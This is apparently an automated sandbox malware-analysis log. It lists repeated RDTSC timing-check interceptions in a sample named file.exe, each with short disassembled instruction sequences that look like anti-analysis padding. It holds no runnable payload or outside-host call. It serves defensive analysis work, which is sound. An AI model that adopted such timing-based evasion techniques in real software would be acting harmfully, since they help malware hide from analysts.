Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1124C9F second address: 1124CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1124CA5 second address: 1124CA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 112533B second address: 1125341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1125341 second address: 112534C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007EFDB8CDCB06h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11254E4 second address: 11254F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8F26A1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11254F6 second address: 1125502 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007EFDB8CDCB06h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11257E1 second address: 11257E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11257E9 second address: 11257ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1125973 second address: 1125979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1125979 second address: 11259A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFDB8CDCB11h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007EFDB8CDCB0Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1125B06 second address: 1125B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFDB8F26A1Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1125B18 second address: 1125B32 instructions: 0x00000000 rdtsc 0x00000002 js 00007EFDB8CDCB06h 0x00000008 jmp 00007EFDB8CDCB10h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1125B32 second address: 1125B3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1125B3A second address: 1125B44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1125B44 second address: 1125B48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1125B48 second address: 1125B4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 112B04A second address: 112B054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007EFDB8F26A16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 112B344 second address: 112B348 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 112B348 second address: 112B37E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8F26A22h 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007EFDB8F26A22h 0x00000010 popad 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 jp 00007EFDB8F26A16h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 112B37E second address: 112B382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1130EEF second address: 1130F00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8F26A1Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1130F00 second address: 1130F05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 112FDB8 second address: 112FDCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007EFDB8F26A1Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 112FDCB second address: 112FDCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F51D8 second address: 10F51EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8F26A1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F51EB second address: 10F5201 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007EFDB8CDCB0Ch 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F5201 second address: 10F5215 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F5215 second address: 10F5219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F5219 second address: 10F521F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F521F second address: 10F5225 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F53A8 second address: 10F53AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F540D second address: 10F5425 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8CDCB14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F5425 second address: 10F544E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007EFDB8F26A27h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], esi 0x00000010 cmc 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F544E second address: 10F5452 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F56E6 second address: 10F56FF instructions: 0x00000000 rdtsc 0x00000002 jp 00007EFDB8F26A1Ch 0x00000008 ja 00007EFDB8F26A16h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F56FF second address: 10F5709 instructions: 0x00000000 rdtsc 0x00000002 jo 00007EFDB8CDCB0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F5ADF second address: 10F5AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F5AE5 second address: 10F5AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F5AEA second address: 10F5AF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007EFDB8F26A16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F5AF4 second address: 10F5AF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F5C91 second address: 10F5C96 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F5C96 second address: 10F5C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F5F5B second address: 10F5F65 instructions: 0x00000000 rdtsc 0x00000002 jl 00007EFDB8F26A16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F5F65 second address: 10F5F6A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F5F6A second address: 10F5F8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFDB8F26A24h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10F5F8B second address: 10F5F8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113016D second address: 1130177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007EFDB8F26A16h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1130177 second address: 113018C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8CDCB0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11302E8 second address: 11302EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11302EE second address: 113030B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007EFDB8CDCB15h 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113078E second address: 1130794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1130794 second address: 11307B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFDB8CDCB18h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11307B1 second address: 11307B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1130A68 second address: 1130A7A instructions: 0x00000000 rdtsc 0x00000002 jng 00007EFDB8CDCB0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1130A7A second address: 1130A7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1130A7E second address: 1130AA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jmp 00007EFDB8CDCB16h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1130AA1 second address: 1130AA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113A5EE second address: 113A5F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113A5F4 second address: 113A5FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113931F second address: 1139327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11394CB second address: 11394D1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11394D1 second address: 11394EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007EFDB8CDCB06h 0x0000000e jmp 00007EFDB8CDCB0Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11394EB second address: 113951A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8F26A29h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007EFDB8F26A1Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11397FF second address: 113981F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8CDCB0Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jno 00007EFDB8CDCB06h 0x00000010 pushad 0x00000011 popad 0x00000012 pop esi 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11399AB second address: 11399BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFDB8F26A1Dh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11399BE second address: 11399D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jc 00007EFDB8CDCB12h 0x0000000d jo 00007EFDB8CDCB06h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11399D3 second address: 11399D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1138F3B second address: 1138F4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007EFDB8CDCB06h 0x0000000a popad 0x0000000b pushad 0x0000000c js 00007EFDB8CDCB06h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1139D22 second address: 1139D2E instructions: 0x00000000 rdtsc 0x00000002 jnc 00007EFDB8F26A16h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113A2DA second address: 113A302 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFDB8CDCB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a ja 00007EFDB8CDCB1Eh 0x00000010 jmp 00007EFDB8CDCB18h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113BBCE second address: 113BBD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113BBD2 second address: 113BBEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFDB8CDCB14h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113E774 second address: 113E778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113E778 second address: 113E79A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007EFDB8CDCB13h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113E79A second address: 113E79E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 113E79E second address: 113E7A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 10B090A second address: 10B090E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11406A4 second address: 11406BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8CDCB14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11406BC second address: 11406DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFDB8F26A24h 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11406DD second address: 11406E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11406E1 second address: 11406FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007EFDB8F26A20h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 114083A second address: 1140850 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFDB8CDCB11h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1146EA1 second address: 1146EA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1146EA7 second address: 1146EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1146EB4 second address: 1146ECA instructions: 0x00000000 rdtsc 0x00000002 jg 00007EFDB8F26A16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b jl 00007EFDB8F26A42h 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1146ECA second address: 1146EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 js 00007EFDB8CDCB22h 0x0000000b jmp 00007EFDB8CDCB16h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 114700B second address: 1147029 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007EFDB8F26A16h 0x0000000a pop ebx 0x0000000b jmp 00007EFDB8F26A23h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1147029 second address: 1147071 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jnl 00007EFDB8CDCB06h 0x0000000d popad 0x0000000e push ebx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007EFDB8CDCB18h 0x00000016 pop ebx 0x00000017 pop edx 0x00000018 pop eax 0x00000019 jp 00007EFDB8CDCB2Ah 0x0000001f jp 00007EFDB8CDCB1Ah 0x00000025 jmp 00007EFDB8CDCB0Eh 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11471CD second address: 11471E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007EFDB8F26A1Ch 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 114C9DB second address: 114C9E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 114CDFE second address: 114CE17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007EFDB8F26A22h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 114DA79 second address: 114DA85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007EFDB8CDCB06h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1151B24 second address: 1151B2D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1151B2D second address: 1151B33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1151B33 second address: 1151B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007EFDB8F26A26h 0x0000000a popad 0x0000000b pushad 0x0000000c jbe 00007EFDB8F26A18h 0x00000012 push edi 0x00000013 pop edi 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007EFDB8F26A16h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115110E second address: 1151114 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 115129E second address: 11512C1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFDB8F26A27h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11512C1 second address: 11512C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11512C5 second address: 11512D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11512D1 second address: 11512D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11512D5 second address: 11512D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 11512D9 second address: 11512FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jc 00007EFDB8CDCB40h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007EFDB8CDCB16h 0x00000014 rdtsc
